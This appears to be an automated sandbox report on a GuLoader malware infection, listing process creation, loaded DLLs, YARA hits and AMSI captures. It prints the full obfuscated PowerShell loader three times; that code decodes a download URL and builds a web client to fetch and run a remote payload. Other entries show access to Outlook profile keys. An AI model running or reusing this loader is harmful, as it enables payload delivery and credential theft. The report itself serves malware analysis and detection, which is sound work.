              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 0000000C.00000002.1838576608.00000000079DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: dxdiag.exe, 00000019.00000002.2181549096.0000000023C1E000.00000040.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2181549096.0000000023A80000.00000040.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.2058701032.0000000023712000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.2061182141.00000000238CC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: dxdiag.exe, dxdiag.exe, 00000019.00000002.2181549096.0000000023C1E000.00000040.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2181549096.0000000023A80000.00000040.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.2058701032.0000000023712000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.2061182141.00000000238CC000.00000004.00000020.00020000.00000000.sdmp, findstr.exe
              Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000C.00000002.1838576608.00000000079DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.1461444403.00000223A7E9B000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinteren", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000C.00000002.1845437156.0000000009FE6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2159570047.0000000003DF6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1845297840.0000000008C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1451665041.000002239FDF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1833143849.0000000005D56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ufrivillige)$gLobAl:sChILLeRfelS169 = [sYSTEM.teXT.ENcODing]::aSCIi.gETSTrING($CHiKee)$globAl:AGRobACtERIum=$ScHiLleRfeLs169.SubstrING($schoOlBOyhOOd,$vIdEResAlGET)<#sknderi skvttede
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Eksport21 $Hemiamyosthenia $Brasserie), (Respekterende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Idaean = [AppDomain]::CurrentDomain.GetAssemblies()$
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Desipient)), $Naturbeskyttelse).DefineDynamicModule($Graybeards184, $false).DefineType($Microbiologists, $Interfereres195, [System.Mul
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ufrivillige)$gLobAl:sChILLeRfelS169 = [sYSTEM.teXT.ENcODing]::aSCIi.gETSTrING($CHiKee)$globAl:AGRobACtERIum=$ScHiLleRfeLs169.SubstrING($schoOlBOyhOOd,$vIdEResAlGET)<#sknderi skvttede
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens '
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens '
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3D9251F5 push eax; ret 3_2_00007FFC3D925251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3D920972 push E95B11D0h; ret 3_2_00007FFC3D9209C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3D9200BD pushad ; iretd 3_2_00007FFC3D9200C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3D9F79FE push ds; ret 3_2_00007FFC3D9F79FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04C0D4E0 pushad ; ret 12_2_04C0D4E1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04C0D78C pushfd ; ret 12_2_04C0D78D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07B2C3DC push eax; ret 12_2_07B2C3DD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07B2C3CD push eax; ret 12_2_07B2C3D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07B2C199 push esp; ret 12_2_07B2C1A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09410B67 push ss; iretd 12_2_09410C11
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09412776 push esp; retf 12_2_09412781
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09411FC2 pushfd ; retf 12_2_09411FCF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_094107EC pushfd ; iretd 12_2_094107ED
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09415D8C push ss; retf 12_2_09415D8D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09412BAC push FFFFFF97h; retf 12_2_09412BB5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09411412 push ecx; iretd 12_2_09411413
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09410CC2 push ebp; iretd 12_2_09410CE3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_094100E2 push edi; retf 12_2_094100E6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_094124EE pushad ; ret 12_2_094124F9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_03220B67 push ss; iretd 25_2_03220C11
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_03222BAC push FFFFFF97h; retf 25_2_03222BB5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_032200E2 push edi; retf 25_2_032200E6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_03222776 push esp; retf 25_2_03222781
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_032207EC pushfd ; iretd 25_2_032207ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_03221FC2 pushfd ; retf 25_2_03221FCF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_03225D8C push ss; retf 25_2_03225D8D
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_03221412 push ecx; iretd 25_2_03221413
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_032224EE pushad ; ret 25_2_032224F9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_03220CC2 push ebp; iretd 25_2_03220CE3
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_0529ED6A push es; ret 28_2_0529ED6F
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052AB547 push ebx; ret 28_2_052AB54A
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
